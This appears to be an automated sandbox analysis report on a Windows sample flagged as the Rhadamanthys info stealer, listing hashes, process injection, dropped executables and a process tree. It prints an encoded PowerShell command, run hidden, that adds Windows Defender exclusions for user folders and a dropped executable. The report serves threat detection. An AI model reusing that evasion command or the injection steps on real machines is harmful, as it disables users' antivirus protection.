Analysis
-
max time kernel
150s -
max time network
102s -
platform
windows11-21h2_x64 -
resource
win11-20240704-en -
resource tags
arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system -
submitted
08-07-2024 09:19
Static task
static1
Behavioral task
behavioral1
Sample
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral2
Sample
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe
Resource
win11-20240704-en
General
-
Target
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe
-
Size
4.3MB
-
MD5
651962c322d049e7271543d8d2673311
-
SHA1
e4a3c9a15006aae882697cff0ec90795f658ee94
-
SHA256
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546
-
SHA512
121b96a1ce8e12924e41c2243cea25dbc13240c6cfadcfe01aecbea1c6676261cbcf89677fb1a8e429e22d47b1030b9e24e03b96a5f7e956316f02bd8d2c74b1
-
SSDEEP
98304:fh0DJ8JeTBYX6L9jeMr31y0pv/u4EmRIO3HLWjds/ht/tpxeSZ:bJeTKX6L9fHBW4bW+zdeS
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exedescription pid process target process PID 2976 created 2568 2976 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe sihost.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 3 IoCs
Processes:
blue.exeblue.exeVersion.exepid process 5504 blue.exe 2184 blue.exe 5664 Version.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exeblue.exedescription pid process target process PID 5228 set thread context of 2976 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 5504 set thread context of 2184 5504 blue.exe blue.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exeopenwith.exepowershell.exepid process 2976 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 2976 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 4752 openwith.exe 4752 openwith.exe 4752 openwith.exe 4752 openwith.exe 6104 powershell.exe 6104 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exeblue.exeblue.exepowershell.exeVersion.exedescription pid process Token: SeDebugPrivilege 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe Token: SeDebugPrivilege 5504 blue.exe Token: SeDebugPrivilege 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe Token: SeDebugPrivilege 5504 blue.exe Token: SeDebugPrivilege 2184 blue.exe Token: SeDebugPrivilege 6104 powershell.exe Token: SeDebugPrivilege 5664 Version.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exeblue.exedescription pid process target process PID 5228 wrote to memory of 5504 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe blue.exe PID 5228 wrote to memory of 5504 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe blue.exe PID 5228 wrote to memory of 5504 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe blue.exe PID 5228 wrote to memory of 2976 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 5228 wrote to memory of 2976 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 5228 wrote to memory of 2976 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 5228 wrote to memory of 2976 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 5228 wrote to memory of 2976 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 5228 wrote to memory of 2976 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 5228 wrote to memory of 2976 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 5228 wrote to memory of 2976 5228 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe PID 2976 wrote to memory of 4752 2976 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe openwith.exe PID 2976 wrote to memory of 4752 2976 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe openwith.exe PID 2976 wrote to memory of 4752 2976 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe openwith.exe PID 2976 wrote to memory of 4752 2976 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe openwith.exe PID 2976 wrote to memory of 4752 2976 33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe openwith.exe PID 5504 wrote to memory of 2184 5504 blue.exe blue.exe PID 5504 wrote to memory of 2184 5504 blue.exe blue.exe PID 5504 wrote to memory of 2184 5504 blue.exe blue.exe PID 5504 wrote to memory of 2184 5504 blue.exe blue.exe PID 5504 wrote to memory of 2184 5504 blue.exe blue.exe PID 5504 wrote to memory of 2184 5504 blue.exe blue.exe PID 5504 wrote to memory of 2184 5504 blue.exe blue.exe PID 5504 wrote to memory of 2184 5504 blue.exe blue.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2568
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4752
-
C:\Users\Admin\AppData\Local\Temp\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe"C:\Users\Admin\AppData\Local\Temp\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5228 -
C:\Users\Admin\AppData\Local\Temp\blue.exe"C:\Users\Admin\AppData\Local\Temp\blue.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5504 -
C:\Users\Admin\AppData\Local\Temp\blue.exe"C:\Users\Admin\AppData\Local\Temp\blue.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2184 -
C:\Users\Admin\AppData\Local\Temp\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe"C:\Users\Admin\AppData\Local\Temp\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2976
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVgBlAHIAcwBpAG8AbgAuAGUAeABlADsA1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6104
-
C:\Users\Admin\AppData\Local\AuditRuleType\dhkobv\Version.exeC:\Users\Admin\AppData\Local\AuditRuleType\dhkobv\Version.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5664
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\33682e861b76b0ae22b7361f5b59bb7e69b95e69480156714f01e7044408b546.exe.log
Filesize958B
MD5f3a9ef806611771e47086f2146b04048
SHA119d790d0255e4227f87aee9c51d50eb05f8bce8f
SHA256eccf4d562c23908f755fe9bb0f9ddd0af31c85392d0d9524064215559424b5fd
SHA5129c3c558d68c84b61cd1d90668f8ba8cf3080e3e5a5a72da9f63ad70cf62342f2631f1321e8430480649ed2d25c15553026e30b6d1fb1f0530e04b53358815613
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.1MB
MD530cd8c00307286863dba2ec13fb2a611
SHA165815b908d5fd2905f70240d6dfe6e17f3c78aa1
SHA256c68192f008c1b7638e18ec1a6e5787953ea6775bb33acf9a12f64440f3b788e7
SHA51276a903bdb21ae382cd737432b2f5b3152589a3d3863c9120e9ad850d8cb46e07b90ed42f21d74840d4dc1383f2aee7bfc24f3f10eba94858e84af762bd404335